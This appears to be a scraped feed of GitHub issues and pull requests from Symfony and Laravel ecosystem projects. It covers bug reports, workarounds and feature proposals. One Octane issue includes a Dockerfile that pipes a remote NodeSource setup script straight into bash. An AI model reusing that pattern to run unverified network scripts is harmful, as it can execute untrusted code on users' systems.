Expected result: Symfony AI should send these speech-to-text options to ElevenLabs and make the returned SRT content accessible.

Current workaround

The only reliable workaround is to bypass Symfony AI and call ElevenLabs directly with Symfony HttpClient:

public function createSubRipText(string $language, string $audio): string
{
    $formData = new FormDataPart(fields: [
        'model_id' => 'scribe_v2',
        'language_code' => $language,
        'tag_audio_events' => 'false',
        'num_speakers' => '1',
        'diarize' => 'true',
        'timestamps_granularity' => 'word',
        'additional_formats' => json_encode(value: [
            [
                'format' => 'srt',
                'include_timestamps' => true,
            ],
        ], flags: JSON_THROW_ON_ERROR),
        'file' => new DataPart(body: $audio, filename: 'audio.mp3', contentType: self::AUDIO_MIME_TYPE),
    ]);

    $url = sprintf('%s/v1/speech-to-text', self::API_URL);

    $response = $this->httpClient->request(method: 'POST', url: $url, options: [
        'headers' => [
            'xi-api-key' => $this->apiKey,
            ...$formData->getPreparedHeaders()->toArray(),
        ],
        'body' => $formData->bodyToIterable(),
    ])->toArray();

    $result = $response['additional_formats'][0]['content'] ?? null;

    if (empty($result)) {
        throw new \RuntimeException(message: 'Failed to create audio SRT subtitles');
    }

    return $result;
}

This works, but it duplicates functionality that should ideally be available through the ElevenLabs bridge.

Proposed solution

There are two related improvements that would solve this:

  1. Forward speech-to-text $options to the ElevenLabs /v1/speech-to-text request body.

    For example, options such as these should be supported:

    [
        'language_code' => 'pl',
        'tag_audio_events' => false,
        'num_speakers' => 1,
        'diarize' => true,
        'timestamps_granularity' => 'word',
        'additional_formats' => [
            [
                'format' => 'srt',
                'include_timestamps' => true,
            ],
        ],
    ]
    
  2. Expose additional transcript formats in the result.

    Possible API options:

    $result->asText(); // existing transcript text
    $result->getRawResult()->getData()['additional_formats'][0]['content']; // already possible if raw data is preserved
    

    Or, preferably, a first-class result API such as:

    $result->asSubRipText();
    

    or:

    $result->getAdditionalFormat('srt');
    

Why this is useful

SRT generation is a common speech-to-text use case for video subtitles, social media videos, accessibility captions, and content workflows. ElevenLabs already supports this natively through additional_formats, so Symfony AI only needs to expose this functionality through the bridge.

Related API behavior

ElevenLabs /v1/speech-to-text accepts multipart fields such as:

model_id
file
language_code
tag_audio_events
num_speakers
timestamps_granularity
diarize
additional_formats

The SRT content is returned in the response under:

$response['additional_formats'][0]['content']

Environment

Symfony AI ElevenLabs bridge: current main / latest release ElevenLabs model: scribe_v2 Use case: speech-to-text with SRT subtitle output

View more
sofyco

sofyco

2nd Jul 2026 @ 15:39

initial issue https://github.com/symfony/symfony/issues/62766


I have a non-nullable title field on Book entity, on an edit form. i tried to clear the title field value and submit the form. it raised an error (http code 500). the expected output is validator error message should be appear (http code 422)

all form, entity, and controller in the reproducer repository were created using maker-bundle

How to reproduce

https://github.com/IndraGunawan/symfony-validator-reproducer

git clone [email protected]:IndraGunawan/symfony-validator-reproducer.git
cd symfony-validator-reproducer
symfony serve

head over to http://127.0.0.1:8000/new and directly click the submit button. This value should not be blank. error will be shown

head over to http://127.0.0.1:8000/edit and clear title field and click the submit button. InvalidTypeException will be raised, Expected argument of type "string", "null" given at property path "title".

TypeError
App\Entity\Book::setTitle(): Argument #1 ($title) must be of type string, null given, called in .../validator-issue-reproducer/vendor/symfony/property-access/PropertyAccessor.php on line 532

MakerBundle generates the setter for non-nullable field, does not allow null on the argument, do we need to update the generator to allow null even for non-nullable field?

View more
IndraGunawan

IndraGunawan

14th Dec 2025 @ 09:13

Hi,

I use a service definition config like this one:

return static function (ContainerConfigurator $container) {
    $services = $container->services();
    $services
        ->defaults()
            ->autowire()
            ->autoconfigure()
            ->tag('monolog.logger', ['channel' => 'defaultchannel'])
   ;

   $services
       ->set(\MyService::class)
            ->tag('monolog.logger', ['channel' => 'specificchannel'])
   ;
}

So I'd like to define a default channel in the service defaults, but override this default for some services. But in reality MyService will always use the defaultchannel and never the specificchannel. This is because

  • Symfony adds both tags to MyService, but the one from defaults last deliberately (in AbstractServiceConfigurator)
  • MonologBundle iterates over all tags in order, and modifies services for each iteration, which means that the last tag will win (in LoggerChannelPass)

Now I'm unsure where the problem is located. Is my reasoning about defaults and specific overrides correct? Is this in theory the right way to do (if not, what is a better/working/official solution?)? Or is this a possible improvement for the bundle?

Thank you in advance for insights 🙂

View more
1 comment
umulmrum

umulmrum

22nd May 2025 @ 20:20

Octane Version

1.0.3

Laravel Version

11.8.0

PHP Version

8.3

What server type are you using?

FrankenPHP

Server Version

1.0.3

Database Driver & Version

No response

Description

Using the latest laravel version as of today.

WARN Your FrankenPHP binary version (1.0.3) may be incompatible with Octane.

Using FROM dunglas/frankenphp:1.0-php8.3

FROM dunglas/frankenphp:1.0-php8.3

ARG DOCKER_WWWGROUP
ARG DOCKER_WWWUSER
ARG NODE_VERSION=20
ARG APP_ENV

WORKDIR /var/www/html

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

# Set timezone
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone

# Update and install essential packages
RUN apt-get -y update --fix-missing && \
    apt-get upgrade -y && \
    apt-get install -y --no-install-recommends \
        apt-utils \
        apt-transport-https \
        curl \
        wget \
        nano \
        dialog \
        build-essential \
        git \
        gnupg2 \
        iputils-ping \
        libonig-dev \
        libsqlite3-dev \
        libsqlite3-0 \
        libzip-dev \
        libicu-dev \
        libxml2-dev \
        libxslt-dev \
        libssh2-1-dev \
        libssh2-1 \
        libcurl4-openssl-dev \
        pkg-config \
        openssl \
        zip \
        unzip \
        supervisor && \
    rm -rf /var/lib/apt/lists/*

# Install Node.js and Yarn
RUN curl -sL https://deb.nodesource.com/setup_$NODE_VERSION.x | bash - && \
    apt-get install -y --no-install-recommends nodejs && \
    npm install --global yarn && \
    rm -rf /var/lib/apt/lists/*

RUN pecl install xdebug

# Install PHP extensions
RUN install-php-extensions \
    pdo_sqlite \
    curl \
    zip \
    intl \
    mbstring \
    gettext \
    calendar \
    exif \
    pcntl \
    dom \
    xsl \
    simplexml \
    bcmath \
    sockets

# Clean up the image
RUN apt-get clean && apt-get autoremove -y

# Get latest Composer
COPY --from=composer:latest /usr/bin/composer /usr/bin/composer

# Create user and group
RUN groupadd --gid 1000 $DOCKER_WWWGROUP && \
    useradd --uid 1000 --gid 1000 -m $DOCKER_WWWUSER && \
    chown 1000:1000 /var/log -R && chown 1000:1000 /var/run/ -R

# Switch to the new user
USER $DOCKER_WWWUSER

# Set the command to run frankenphp
ENTRYPOINT ["php", "artisan", "octane:frankenphp"]

Steps To Reproduce

see above

View more
5 comments
tebbbb

tebbbb

17th Jul 2024 @ 16:50

Hi, Symfony has a large community of Iranian developers and I suggest adding translation for the Persian language.

View more
4 comments
javadsaeid

javadsaeid

2nd May 2023 @ 04:53

help wanted findapr

Hello, When using php-flasher-toastr with Laravel 11, I encounter a TypeError: array_replace_recursive(): Argument #2 must be of type array, int given error in Illuminate\Translation\FileLoader at line 130. My environment:

  • PHP: 8.3.7
  • Laravel: 11.4.2
  • php-flasher/flasher-toastr-laravel: 2.1
  • php-flasher/flasher-laravel: 2.1 The error disappears when I uninstall php-flasher/flasher-toastr-laravel and php-flasher/flasher-laravel. Alternatively, ensuring that the value passed to with() is always a string (e.g., with('success', 'Message')) prevents the error.
View more
2 comments
Gnoth2n5

Gnoth2n5

27th Mar 2025 @ 17:30

I can't solve the problem for two days. I run it on a local computer and everything works fine. I transferred the project to Ubuntu 22.04 and it gives me this error. Laravel + Symphony panther bundle

Symfony\Component\Panther\Exception\RuntimeException Could not start chrome. Exit code: 1 (General error). Error output: cannot join mount namespace of pid 1: Operation not permitted

View more
4 comments
rekreg

rekreg

13th Feb 2025 @ 10:25

The following errors are happening in a production & staging environment when we attempt to screenshot with panther, set size for the window, or do anything that utilizes panther for web scraping. It seems like the connection drops or is lost between panther and php-webdriver.

Errors:

Facebook\WebDriver\Exception\Internal\WebDriverCurlException: Curl error thrown for http POST to /session with params: 
{
    "capabilities": {
        "firstMatch": [
            {
                "browserName": "chrome",
                "goog:chromeOptions": {
                    "args": [
                        "--no-sandbox",
                        "--headless",
                        "--disable-dev-shm-usage",
                        "--hide-scrollbars"
                    ]
                }
            }
        ]
    },
    "desiredCapabilities": {
        "browserName": "chrome",
        "platform": "ANY",
        "goog:chromeOptions": {
            "args": [
                "--no-sandbox",
                "--headless",
                "--disable-dev-shm-usage",
                "--hide-scrollbars"
            ]
        }
    }
}
...
Operation timed out after 180000 milliseconds with 0 bytes received in /app/vendor/php-webdriver/webdriver/lib/Exception/Internal/WebDriverCurlException.php:20

Current Workarounds:

  • implemented exponential backoff when the WebDriverCurlException is thrown
  • implementing longer timeouts for connection, request, & read.

Versions::

  • php: 8.3
  • symfony: 6.4
  • symfony/panther: 2.1.1
  • php-webdriver/webdriver: 1.15.1
  • chrome: latest
  • chromedriver: latest, stable for chrome
View more
5 comments
Capn-Precious

Capn-Precious

19th Aug 2024 @ 13:34

If I call another console command in a running console command, the output is closed after the inner command returns.

E.g. Run Messenge consumer which starts a console command. After starting the console command, the output is overwritten by the new output, provided to Application.php by running the inner command. When the inner command ends, the Application.php fires a terminate event, which causes the ConsoleHandler to close the output. After that there is no more output on console available.

Solution: Maybe the Handlers should stack there outputs and get the last out of the stack when the terminate event is fired until there is no output left and then close the handler.

View more
DemigodCode

DemigodCode

22nd Mar 2021 @ 19:05

In the first parameter, a presenter string is required either "html" or "json".

View more
bishwajitcadhikary

bishwajitcadhikary

20th Aug 2024 @ 11:35

Since #60645, SqsQueue::bulk() dispatches jobs via the SendMessageBatch API, splitting them into chunks of 10 messages / 1 MB and sending the chunks one at a time. Sequential dispatch is required for FIFO queues — a later chunk must not arrive ahead of an unsent one — but standard queues make no ordering guarantees, so a large bulk dispatch currently pays for hundreds of serial HTTP round-trips it doesn't need (a 10,000 job bulk is 1,000 sequential requests).

This PR dispatches the batch requests concurrently when the queue is a standard queue, while keeping FIFO dispatch strictly ordered.

How it works

The chunk requests are yielded lazily from a generator and driven by GuzzleHttp\Promise\Each::ofLimitAll(), so "sequential vs. concurrent" is simply the concurrency argument:

  • FIFO queues run at a concurrency of 1: the next request is not created until the previous one has settled, preserving today's ordering and stop-at-first-failure behavior exactly.
  • Standard queues run at SqsQueue::MAX_CONCURRENT_BATCH_REQUESTS (50), which subclasses may override.

Laziness matters here: a promise created by sendMessageBatchAsync() is already registered on the shared curl multi handle, and the first wait() transmits every registered transfer at once. Because requests only come into existence when the pool pulls them from the generator, un-launched chunks remain genuinely un-launched.

Failure semantics

The same contract as every other driver's bulk(), where a failed push() simply throws: the first failed chunk rejects the aggregate promise, its exception is rethrown untouched, and chunks that were not yet dispatched are never sent. Entry-level failures inside an HTTP 200 response are surfaced as the same synthesized SqsException as before, with an unchanged message format.

As with the sequential implementation — or any driver failing mid-bulk() — a thrown exception means the dispatch may have partially completed: chunks accepted before the failure are on the queue and have raised their JobQueued events, and with concurrent dispatch up to forty-nine in-flight chunks may additionally land after the failure. SQS standard queues are at-least-once delivery, so consumers of bulk dispatch at this scale should already be idempotent.

The AWS SDK for PHP has no native handling for any of this — sendMessageBatch rejects more than 10 entries outright, and unlike the Java SDK's buffered SQS client (or the PHP SDK's own DynamoDB WriteRequestBatch), it offers no chunking or parallel dispatch for SQS.

On Guzzle handlers without curl_multi support (e.g. the stream handler), the standard-queue path gracefully degrades to sequential execution with identical results.

🤖 Generated with Claude Code

View more
👀 1
kieranbrown

kieranbrown

13th Jul 2026 @ 21:38

Priority: P2 (High - Fix Soon)

Problem

Both CreateScheduleRequestData (src/Data/Requests/Schedule/CreateScheduleRequestData.php:24) and UpdateScheduleRequestData (:17) accept a ScheduleStatusEnum $status property.

However, the status column was dropped from the schedules table in migration 2024_10_13_214300. The Schedule model computes status from scheduled_at/completed_at via an Attribute accessor. Any status value sent via the API is silently ignored.

Suggested Fix

Remove the $status property from both request data classes, or validate and map it to completed_at if the intent is to let API consumers set a schedule to "complete".

View more
jbrooksuk

jbrooksuk

9th Mar 2026 @ 11:42

This pull request updates the Docker setup for Cachet with the following improvements:

  • Refactored architecture to separate the application, scheduler, and worker into individual containers for better isolation, scalability, and maintainability.
  • Enhanced documentation in README.md with architecture rationale, production best practices, and maintenance instructions.
  • Updated GitHub Actions workflow (.github/workflows/docker-publish.yml) for multi-platform image builds, improved version handling, and secure registry logins.
  • Added security recommendations and reverse proxy setup examples.
  • Improved backup, restore, and troubleshooting sections.

These changes make the deployment more robust, secure, and easier to manage in production environments. Please review and merge into the main project.

View more
6 comments 👍 1
steffjenl

steffjenl

25th Jul 2025 @ 09:05

I am using panther with chromedriver. I use it in a Symfony command to scrape a webpage.

$default_arguments = [
    "--headless",
    "--window-size=1280,1024",
    "--disable-gpu",
    "--no-sandbox",
    "--disable-dev-shm-usage",
];

$arguments = array_merge($default_arguments, $arguments);

$client = PantherClient::createChromeClient(null, $arguments , $options);

At the termination of the command (or even if I force cancel the command mid way) I am getting this error:

In WebDriverCurlException.php line 20:
                                                                                   
  [Facebook\WebDriver\Exception\Internal\WebDriverCurlException]                   
  Curl error thrown for http DELETE to /session/f2c85b0b97dcff0c666368402bab27ec   
                                                                                   
  Failed to connect to 127.0.0.1 port 9515 after 0 ms: Couldn't connect to server  

Any suggestion of why this happens? It would seem like the chromedriver api listening on port 9515 shutdown before that DELETE endpoint is called. But I m not sure why.

View more
1 comment 👍 1
ElGabbu

ElGabbu

26th Jul 2025 @ 15:56

dependencies php

Bumps intervention/image from 3.11.7 to 4.1.4.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

19th Jun 2026 @ 02:03

dependencies

Bumps actions/checkout from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

22nd Jun 2026 @ 16:14

Summary

This PR adds an opt-in way for Redis cache stores to clear only keys managed by the configured Laravel cache prefix instead of flushing the selected Redis database.

It introduces:

  • Illuminate\Contracts\Cache\CanFlushPrefix
  • RedisStore::flushPrefix()
  • Repository::flushPrefix() / supportsFlushingPrefix()
  • php artisan cache:clear --prefix
  • cache.stores.redis.flush_scope, configurable with REDIS_CACHE_FLUSH_SCOPE=prefix

The existing Redis cache flush() behavior is unchanged and continues to call FLUSHDB unless the new prefix mode is explicitly requested.

Why

Laravel's default Redis configuration has historically encouraged isolating cache data in a separate logical Redis database. That is increasingly difficult with managed Redis-compatible services:

That means applications running on modern Redis Cluster, Redis Cloud, Redis Software, or ElastiCache Serverless deployments need a first-party way to clear only Laravel cache keys without clearing unrelated data that shares database zero.

Backwards Compatibility

This is intended to be backwards compatible:

  • RedisStore::flush() still calls flushdb().
  • cache:clear still uses the existing flush behavior by default.
  • Prefix clearing is only used when cache:clear --prefix is passed or when cache.stores.redis.flush_scope is set to prefix.
  • The new cache store capability is an optional contract, so existing cache store implementations are not required to add new methods.
  • Prefix clearing refuses to run when the Redis cache store has an empty prefix.

Tests

  • vendor/bin/pint --dirty
  • git diff --check
  • vendor/bin/phpunit tests/Cache/CacheRedisStoreTest.php tests/Cache/ClearCommandTest.php tests/Cache/CacheEventsTest.php
  • vendor/bin/phpunit tests/Cache

The full cache suite passes. PHPUnit reports the existing notices/skips from the suite: 8 notices and 13 skipped tests.

View more
DGarbs51

DGarbs51

9th Jul 2026 @ 01:21

Feature ExpressionLanguage Status: Reviewed
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
Issues Fix #64802
License MIT

Description This PR adds the native PHP count() function to the ExpressionLanguage component. This allows developers to use count(items) directly in expressions, simplifying code and making expressions more powerful.

Usage example

$language = new ExpressionLanguage();
$result = $language->evaluate('count([1,2,3]) > 2'); // true
$result = $language->evaluate('count(items) > 2', ['items' => ['a', 'b', 'c']]); // true
View more
payene

payene

10th Jul 2026 @ 21:13

help wanted

We need a method of migrating users from 2.4 to 3.x.

Things to consider:

  • Migrate settings
  • Migrate resources
  • Migrate subscriptions / subscribers
  • Migrate API Keys

AOB (please add to this list)


As a comment on the latter, once #183 is merged, we'll need to programmatically migrate users 2.4 API Keys to 3.x using something like the following

$v2ApiKey = $v2User->api_key;

$v3User->tokens()->create([
    'name' => 'v2.4 API Key',
    'token' => hash('sha256', $v2ApiKey),
    'abilities' => ['*'],
    'expires_at' => now()->addDays(90),
]);

@jbrooksuk We need to decide on the abilities and expires_at. IMO it makes sense to throw something into the upgrade documentation that old 2.4 API Keys will continue to work for up to 90 days. But if they want to use the API after that, then they'll need to generate a new API Token using the 3.x dashboard.

View more
1 comment
joelbutcher

joelbutcher

15th Jan 2025 @ 18:19

Status: Needs Review LiveComponent
Q A
Bug fix? yes
New feature? no
Deprecations? no
Documentation? no
Issues Fix #3424
License MIT

Summary

When a parent live component action removes and re-adds a child live component on the same DOM element, Stimulus keeps the controller instance alive — it only calls disconnect() then connect() again, not initialize(). Because createComponent() only runs in initialize(), the Component (and its ValueStore) keep the stale props from before the parent action, even though the server-rendered HTML now exposes a fresh set.

The next user input then throws Uncaught Error: Invalid model name "xyz.content" — the model name has changed, but ValueStore.has() still looks up against the old props.

Fix

In connect(), compare the current propsValue (which Stimulus has refreshed from the live data-live-props-value attribute) against component.valueStore.getOriginalProps(). When they differ, rebuild the Component.

  • First connect() after initialize(): props match by construction → no rebuild.
  • Plain disconnect/reconnect without any prop change: props match → no rebuild.
  • Parent morph that swaps props on the same element: props diverge → rebuild.

The diagnosis and proposed fix are from @Pechynho in #3424 (confirmed working by another reporter in the thread).

Test plan

  • New unit test rebuilds the Component on reconnect when props changed in between exercises the bug scenario by calling controller.disconnect() / mutating propsValue / controller.connect(), and asserts the Component instance has been swapped and the new ValueStore reflects the fresh props.
  • New unit test keeps the existing Component on reconnect when props are unchanged asserts that a no-op reconnect cycle does not recreate the Component.
  • Full LiveComponent controller test suite still green (109 tests).
  • oxlint + oxfmt --check clean.

Fixes #3424

View more
4 comments
Amoifr

Amoifr

12th May 2026 @ 13:59

Platform Status: Needs Review BC Break

The Albert bridge was requiring the API version in the base URL (e.g. https://example.com/v1) and overriding completionsPath/embeddingsPath to compensate, while Generic and all other bridges expect a bare base URL and include the version in the path (/v1/chat/completions).

Drop the version validation and the path overrides so Albert delegates entirely to Generic defaults, aligning both conventions.

Q A
Bug fix? no
New feature? no
Docs? no
Issues Fix #2240
License MIT
View more
2 comments
jvancoillie

jvancoillie

25th Jun 2026 @ 16:36

help wanted

Octane Version

2.9

Laravel Version

12

PHP Version

8.4

What server type are you using?

FrankenPHP

Server Version

1.12

Database Driver & Version

No response

Description

The current Caddy configuration template for FrankenPHP utilizes a broad try_files directive: try_files {path} frankenphp-worker.php

This logic causes all requests for non-existent static files (e.g., versioned assets like app-v123.js after a deployment) to be forwarded to the PHP worker. In high-traffic environments, a surge of requests for missing assets triggers unnecessary PHP process execution, leading to worker saturation, increased CPU/Memory overhead, and potential system failure.

Technical Impact

  • Performance: High overhead for 404 responses that should be handled at the web-server level.
  • Stability: Potential DoS condition when static asset paths are brute-forced or when client-side caches request deprecated versioned files.
  • Resource Allocation: PHP workers are occupied by I/O-bound requests for missing files instead of processing dynamic application logic.

Proposed Solution Refactor the Caddyfile logic to isolate static file handling. A dedicated matcher for common file extensions should be implemented to ensure that if a static file is not found on disk, Caddy returns a 404 Not Found immediately, bypassing the php_server or php_dispatch logic.

Recommended Configuration Change Define a matcher for static assets and handle them via file_server exclusively:

@static {
    path *.css *.js *.mjs *.map *.ico *.png *.jpg *.jpeg *.gif *.svg *.webp *.avif *.woff *.woff2 *.ttf *.otf *.eot *.mp4 *.webm *.ogg *.mp3 *.wav *.pdf *.zip *.txt *.xml *.json *.wasm *.webmanifest *.manifest
}

file_server @static

Steps To Reproduce

  1. Deploy Laravel Octane with FrankenPHP.
  2. Request a non-existent file with a .js or .css extension.
  3. Observe that the request is processed by frankenphp-worker.php (returning a Laravel 404) instead of a native Caddy 404.
View more
3 comments
eugene-nuwber

eugene-nuwber

7th Apr 2026 @ 09:52

Bug more information needed

Version: 3.x dev demo Issue details:

  • After creating an incident and setting the "Occurred at" to today with any time, the incident does not appear on the status page
  • Setting the incident to yesterday does make the incident appear
  • It is possibly to do with me being in Australia, even though I set the timezone in Cachet to Melbourne/Australia
View more
7 comments
adamb53

adamb53

20th May 2024 @ 22:30

filament

Timezone set in "Manage Cachet" should also affect timezone handling in the dashboard wich is still using UTC when for example Europe/Berlin in configured.

View more
mammutserver

mammutserver

6th Mar 2025 @ 20:14

Versions

  • spatie/laravel-multitenancy: 4.1.3 (behaviour unchanged on main at time of writing)
  • laravel/framework: 12.x
  • PHP: 8.4

Description

When queues_are_tenant_aware_by_default is enabled, MakeQueueTenantAwareAction::bindOrForgetCurrentTenant() calls Tenant::forgetCurrent() when a NotTenantAware job starts processing, and nothing ever restores the tenant that was current before the job.

On a queue worker this goes unnoticed, because every job re-binds its own tenant and nothing meaningful runs between jobs. But when a job executes in-process — the sync driver, or dispatchSync() on any app — the job runs inside the dispatching request, so the dispatcher loses its current tenant for the remainder of the request:

$tenant->makeCurrent();

SomeNotTenantAwareJob::dispatchSync();

Tenant::current(); // null — the request continues with no tenant

Everything tenant-dependent after that point misbehaves. The loudest symptom is dispatching a TenantAware job afterwards, which throws CurrentTenantCouldNotBeDeterminedInTenantAwareJob because no tenant was current at dispatch time. Tenant-scoped queries in the same window fail silently, which is worse.

The same mechanism affects TenantAware jobs run via dispatchSync() for a different tenant than the request's: after the job, the request continues under the job's tenant instead of its own.

This contradicts the documented behaviour

From docs/basic-usage/making-queues-tenant-aware.md:

"On the other hand, a job that is not tenant aware will make no modifications to the current tenant, which may still be set from a previous job."

The current implementation does modify it — forgetCurrent() — with no restore. (I suspect the forgetCurrent() was added as hygiene so a previous job's tenant can't bleed into a not-tenant-aware job, which is good — but the docs' contract that the surrounding context's tenant survives was lost in the process.)

Reproduction (failing test against this package's suite)

Verified failing against main (032e74c): the first expectation passes (the job itself correctly runs without a tenant), the second fails with Tenant::checkCurrent() returning false. The package's existing QueueIsTenantAwareByDefaultTest passes in the same environment.

Drop this into tests/Feature/TenantAwareJobs/ — it reuses the existing NotTenantAwareTestJob test class:

<?php

use Spatie\Multitenancy\Models\Tenant;
use Spatie\Multitenancy\Tests\Feature\TenantAwareJobs\TestClasses\NotTenantAwareTestJob;
use Spatie\Valuestore\Valuestore;

beforeEach(function () {
    config()->set('multitenancy.queues_are_tenant_aware_by_default', true);
    config()->set('queue.default', 'sync');

    $this->tenant = Tenant::factory()->create();
    $this->valuestore = Valuestore::make(tempFile('tenantAware.json'))->flush();
});

it('does not lose the dispatching context\'s tenant after a sync NotTenantAware job', function () {
    $this->tenant->makeCurrent();

    dispatch(new NotTenantAwareTestJob($this->valuestore));

    // The job itself correctly ran without a tenant:
    expect($this->valuestore->get('tenantId'))->toBeNull();

    // But the dispatching context's tenant should still be current — this fails:
    expect(Tenant::checkCurrent())->toBeTrue()
        ->and(Tenant::current()->id)->toBe($this->tenant->id);
});

Who hits this in practice

  • Any app running the sync driver (Laravel's fallback default when QUEUE_CONNECTION is unset)
  • Any app calling dispatchSync() mid-request
  • Standard Laravel test suites (QUEUE_CONNECTION=sync in phpunit.xml): a model observer that dispatches a NotTenantAware job silently drops the tenant for the rest of the test — this is how we found it. Two earlier "fixes" in our codebase (marking a job NotTenantAware, adding a Queue::fake()) turned out to be band-aids over this same root cause.

The docs and an existing test disagree — which reflects the intent?

I want to flag this carefully rather than assert it's simply a bug, because there is an existing test asserting the current behaviour: in TenantAwareJobThatCannotFindTenantTest, "it will forget any current tenant when starting a not tenant aware job" dispatches on the sync driver and then asserts assertNull(Tenant::current()) after the dispatch has returned.

Reading that test's comments ("Simulate a tenant being set from a previous queue job"), its intent looks like worker hygiene: a stale tenant from a previous job must not bleed into a not-tenant-aware job — which makes complete sense. But the final assertion observes the forgotten tenant after the dispatch returns, which on the sync driver means it also pins down the side effect described above: the dispatching context loses its tenant permanently. That post-dispatch state is where the test and the documented contract ("will make no modifications to the current tenant") seem to point in opposite directions.

So my question is: which one reflects the intended behaviour?

  • If the docs are the intent (jobs run with the right tenant context, but processing a job makes no net modification to the dispatcher's current tenant), then the action needs a restore step and that one test assertion needs adjusting.
  • If the test is the intent (the current tenant is genuinely meant to be gone after a not-tenant-aware job is processed in-process), then the docs sentence quoted above is misleading and apps using the sync driver or dispatchSync() need to re-bind their tenant manually — which would be worth documenting.

For what it's worth, I have a working fix for the first interpretation validated against this package's test suite (restore the previously-current tenant on JobProcessed/JobExceptionOccurred, preserving the bleed-in protection during the job itself — all existing tests pass apart from the post-dispatch assertion discussed above). I'd be happy to open a PR if you confirm that's the direction you want; equally happy if the answer is "docs need updating" instead.

View more
Nicholasbell03

Nicholasbell03

11th Jun 2026 @ 16:51

Bug Status: Needs Review LiveComponent
Q A
Bug fix? yes
New feature? no
Issues Fix #767
License MIT

A single <select> without a placeholder/empty option is auto-selected by the browser on its first <option>. In a native form POST, that first option is submitted as if picked. Inside a LiveComponent form, however, the model stayed null until the user actually interacted with the field, so a NotBlank() constraint failed even though the option appeared selected.

SetValueOntoModelFieldsPlugin already handles this for selects carrying a data-model (#469), but it only iterated over [data-model] elements. Form fields inside <form data-model="*"> are bound through their name attribute and have no data-model of their own, so they were skipped.

This widens the selector to also pick up select[name] elements and resolves their model through the existing getModelDirectiveFromElement() (which already knows how to derive the model name from name within a data-model form). The existing single-select sync logic then reflects the auto-selected option into the model — matching native browser behavior.

Added a unit test mirroring the existing #469 one, but for a select living inside a <form data-model="*">.

View more
1 comment
Amoifr

Amoifr

1st Jun 2026 @ 07:34

Summary

Extends the existing "Only To Others - Configuration" section to document how to retrieve the socket ID when using the framework adapter packages (@laravel/echo-react, @laravel/echo-vue, @laravel/echo-svelte).

Previously, this section only showed the vanilla Echo approach (Echo.socketId()), leaving framework adapter users without guidance — which led to confusion and workarounds (see laravel/echo#474).

What's added

  • echo().socketId() via the exported echo() helper, for interceptor setup and outside-component usage
  • useSocketId() reactive hook/composable/rune for inside-component usage, with examples for all three adapters

Related

  • laravel/echo#474
  • laravel/echo#499 (adds the useSocketId() hook itself)
View more
hectorgrecco

hectorgrecco

14th May 2026 @ 01:02

Feature Status: Needs Work Tui
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
Issues -
License MIT

Adds a multiselect option to the SelectListWidget:

View more
HypeMC

HypeMC

11th Jul 2026 @ 22:35

Laravel Version

12.35.0

PHP Version

8.3.24

Database Driver & Version

No response

Description

After running frankenphp for a long time in a production environment, execute the following command:

sudo docker exec myproject php /var/www/artisan octane:reload

Will cause curl error:

production.ERROR: cURL error 77: Unable to initialize NSS: -12285 (SSL_ERROR_NO_CERTIFICATE) (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://xxx {"exception":"[object] (GuzzleHttp\Exception\RequestException(code: 0): cURL error 77: Unable to initialize NSS: -12285 (SSL_ERROR_NO_CERTIFICATE) (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://xxx at /var/www/vendor/guzzlehttp/guzzle/src/Handler/CurlFactory.php:276)

Can only be restored through restart

Steps To Reproduce

sudo docker exec myproject php /var/www/artisan octane:reload

View more
1 comment
phenixsoul

phenixsoul

5th Dec 2025 @ 08:25

dependencies javascript

Bumps postcss from 8.5.8 to 8.5.15.

Dependabot compatibility score

You can trigger a rebase of this PR by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
1 comment
dependabot[bot]

dependabot[bot]

28th May 2026 @ 08:25

Documentation Status: Needs Review Feature
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues Fix #3149
License MIT

This PR adds support for pushing browser history entries when a LiveComponent updates URL-bound LiveProp values.

Until now, URL updates were always done with history.replaceState(), which overwrote the current entry. With this change, components can opt in to history.pushState() so users can navigate previous component states via the browser back button (for example, previous pages in pagination or prior filter states in search UIs).

Included changes:

  • Added a new pushHistoryState parameter to #[AsLiveComponent(...)] (default: false).
